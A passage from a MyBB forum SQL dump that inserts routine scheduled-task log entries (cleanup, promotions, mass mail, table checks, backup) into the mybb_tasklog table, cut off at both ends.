ran.'); INSERT INTO mybb_tasklog VALUES('13360', '3', '1351449924', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13361', '1', '1351449927', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13362', '7', '1351449957', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13363', '5', '1351449966', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13364', '9', '1351450307', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13365', '9', '1351452756', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13366', '3', '1351453649', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13367', '1', '1351453665', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13368', '7', '1351453667', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13369', '5', '1351453710', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13370', '9', '1351453756', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13371', '9', '1351454437', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13372', '3', '1351454444', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13373', '1', '1351454516', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13374', '7', '1351454522', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13375', '5', '1351455098', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13376', '9', '1351455108', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13377', '5', '1351456032', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13378', '9', '1351456039', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13379', '3', '1351456828', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13380', '9', '1351456852', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13381', '5', '1351457629', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13382', '9', '1351457734', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13383', '3', '1351458371', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13384', '1', '1351458401', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13385', '7', '1351458404', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13386', '5', '1351458745', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13387', '9', '1351458749', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13388', '5', '1351459509', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13389', '9', '1351459623', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13390', '3', '1351459812', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13391', '9', '1351460654', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13392', '5', '1351460710', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13393', '9', '1351462389', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13394', '3', '1351462476', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13395', '1', '1351462522', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13396', '7', '1351462526', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13397', '5', '1351462532', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13398', '5', '1351463143', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13399', '9', '1351463431', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13400', '3', '1351463515', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13401', '9', '1351464463', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13402', '5', '1351464548', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13403', '9', '1351465101', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13404', '3', '1351465144', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13405', '1', '1351465203', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13406', '7', '1351465206', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13407', '5', '1351465768', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13408', '9', '1351466028', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13409', '5', '1351466781', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13410', '9', '1351466798', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13411', '3', '1351467540', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13412', '9', '1351469039', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13413', '5', '1351469167', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13414', '3', '1351469178', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13415', '1', '1351469181', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13416', '2', '1351469302', 'The daily cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13417', '7', '1351469319', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13418', '11', '1351469338', 'The delayed moderation task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13419', '9', '1351469510', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13420', '5', '1351471829', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13421', '9', '1351471853', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13422', '3', '1351471857', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13423', '9', '1351473311', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13424', '3', '1351473322', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13425', '1', '1351473328', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13426', '7', '1351473619', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13427', '5', '1351474155', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13428', '9', '1351474192', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13429', '3', '1351475514', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13430', '9', '1351476008', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13431', '5', '1351476012', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13432', '3', '1351476069', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13433', '1', '1351476070', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13434', '7', '1351476074', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13435', '5', '1351476489', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13436', '9', '1351476690', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13437', '5', '1351478334', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13438', '9', '1351478739', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13439', '3', '1351478744', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13440', '5', '1351478806', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13441', '9', '1351479429', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13442', '3', '1351480259', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13443', '1', '1351480265', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13444', '7', '1351480269', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13445', '5', '1351480280', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13446', '9', '1351480283', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13447', '5', '1351481548', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13448', '9', '1351481719', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13449', '3', '1351481722', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13450', '9', '1351482184', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13451', '5', '1351482387', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13452', '9', '1351483396', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13453', '3', '1351483401', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13454', '1', '1351483659', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13455', '7', '1351483665', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13456', '5', '1351483667', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13457', '9', '1351484281', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13458', '5', '1351484818', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13459', '9', '1351484828', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13460', '3', '1351486152', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13461', '9', '1351489499', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13462', '5', '1351489504', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13463', '3', '1351489541', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13464', '1', '1351489673', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13465', '7', '1351489693', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13466', '9', '1351491169', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13467', '3', '1351491175', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13468', '1', '1351492767', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13469', '7', '1351492789', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13470', '5', '1351495352', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13471', '9', '1351495444', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13472', '3', '1351495458', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13473', '1', '1351501058', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13474', '7', '1351501064', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13475', '5', '1351501108', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13476', '9', '1351501148', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13477', '3', '1351502254', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13478', '1', '1351502275', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13479', '7', '1351502280', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13480', '5', '1351502314', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13481', '9', '1351502331', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13482', '5', '1351503022', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13483', '9', '1351504806', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13484', '3', '1351504812', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13485', '5', '1351506023', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13486', '1', '1351506089', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13487', '7', '1351506101', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13488', '9', '1351506253', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13489', '5', '1351506400', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13490', '9', '1351506433', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13491', '3', '1351506644', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13492', '9', '1351508005', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13493', '5', '1351508076', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13494', '9', '1351508131', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13495', '3', '1351508564', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13496', '1', '1351509128', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13497', '7', '1351509204', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13498', '5', '1351510764', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13499', '9', '1351512431', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13500', '3', '1351512496', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13501', '5', '1351512605', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13502', '1', '1351515922', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13503', '4', '1351522066', 'The database backup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13504', '7', '1351524347', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13505', '9', '1351524476', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13506', '5', '1351524492', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13507', '3', '1351524495', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13508', '1', '1351524506', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13509', '3', '1351524779', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13510', '9', '1351525319', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13511', '5', '1351526074', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13512', '9', '1351526186', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13513', '3', '1351526425', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13514', '1', '1351526445', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13515', '7', '1351526455', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13516', '5', '1351526721', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13517', '9', '1351527006', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13518', '5', '1351527946', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13519', '9', '1351528101', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13520', '3', '1351528251', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13521', '9', '1351528999', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13522', '5', '1351529112', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13523', '9', '1351529763', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13524', '3', '1351529969', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13525', '1', '1351530054', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13526', '7', '1351530096', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13527', '5', '1351530307', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13528', '9', '1351530626', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13529', '5', '1351531598', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13530', '9', '1351531623', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13531', '3', '1351531874', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13532', '9', '1351532534', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13533', '5', '1351532717', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13534', '9', '1351533341', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13535', '3', '1351533581', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13536', '1', '1351533625', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13537', '7', '1351533637', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13538', '5', '1351533946', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13539', '9', '1351534244', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13540', '5', '1351535151', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13541', '9', '1351535578', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13542', '3', '1351535601', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13543', '9', '1351536025', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13544', '5', '1351536387', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13545', '9', '1351536911', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13546', '3', '1351537144', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13547', '1', '1351537212', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13548', '7', '1351537218', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13549', '5', '1351537521', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13550', '9', '1351537821', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13551', '5', '1351538708', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13552', '9', '1351538731', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13553', '3', '1351539127', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13554', '9', '1351539650', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13555', '5', '1351540100', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13556', '9', '1351540654', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13557', '3', '1351540781', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13558', '1', '1351540807', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13559', '7', '1351540823', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13560', '5', '1351541145', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13561', '9', '1351541495', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13562', '5', '1351542368', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13563', '9', '1351542372', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13564', '3', '1351542630', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13565', '9', '1351543349', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13566', '5', '1351543627', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13567', '9', '1351544155', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13568', '3', '1351545060', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13569', '1', '1351545073', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13570', '7', '1351545081', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13571', '5', '1351545113', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13572', '9', '1351545131', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13573', '5', '1351545942', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13574', '9', '1351547272', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13575', '3', '1351547337', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13576', '5', '1351547346', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13577', '9', '1351548257', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13578', '3', '1351548264', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13579', '1', '1351548269', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13580', '7', '1351548281', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13581', '5', '1351548319', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13582', '9', '1351548758', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13583', '5', '1351549515', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13584', '9', '1351549875', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13585', '3', '1351549899', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13586', '9', '1351550454', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13587', '5', '1351551447', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13588', '9', '1351551482', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13589', '3', '1351551778', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13590', '1', '1351552165', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13591', '7', '1351552178', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13592', '5', '1351552188', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13593', '9', '1351552227', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13594', '5', '1351553819', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13595', '9', '1351553900', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13596', '3', '1351553942', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13597', '9', '1351554285', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13598', '5', '1351554387', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13599', '9', '1351555654', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13600', '3', '1351555672', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13601', '1', '1351555715', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13602', '2', '1351555800', 'The daily cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13603', '7', '1351555886', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13604', '11', '1351555900', 'The delayed moderation task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13605', '5', '1351556177', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13606', '9', '1351557410', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13607', '5', '1351558032', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13608', '3', '1351558035', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13609', '9', '1351558049', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13610', '9', '1351559208', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13611', '3', '1351559255', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13612', '1', '1351559260', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13613', '7', '1351559294', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13614', '5', '1351559299', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13615', '9', '1351559430', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13616', '5', '1351560304', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13617', '9', '1351560307', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13618', '3', '1351560823', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13619', '9', '1351562354', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13620', '5', '1351562395', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13621', '3', '1351562435', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13622', '1', '1351562441', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13623', '7', '1351562444', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13624', '5', '1351563958', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13625', '9', '1351563984', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13626', '3', '1351564533', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13627', '9', '1351565542', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13628', '5', '1351565546', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13629', '9', '1351565884', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13630', '3', '1351566173', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13631', '1', '1351566194', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13632', '7', '1351566268', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13633', '5', '1351568230', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13634', '9', '1351568274', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13635', '3', '1351568988', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13636', '9', '1351570405', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13637', '5', '1351570431', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13638', '3', '1351570492', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13639', '1', '1351570522', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13640', '7', '1351570527', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13641', '5', '1351571212', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13642', '9', '1351571217', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13643', '3', '1351571486', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13644', '9', '1351572543', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13645', '5', '1351572545', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13646', '9', '1351573132', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13647', '3', '1351573178', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13648', '1', '1351573238', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13649', '7', '1351573266', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13650', '5', '1351573503', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13651', '9', '1351574417', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13652', '5', '1351574704', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13653', '9', '1351574738', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13654', '3', '1351576446', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13655', '9', '1351578058', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13656', '5', '1351578069', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13657', '3', '1351578071', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13658', '1', '1351578074', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13659', '7', '1351578079', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13660', '5', '1351578407', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13661', '9', '1351578520', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13662', '3', '1351581486', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13663', '9', '1351581648', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13664', '5', '1351582649', 'The promotions task successfully 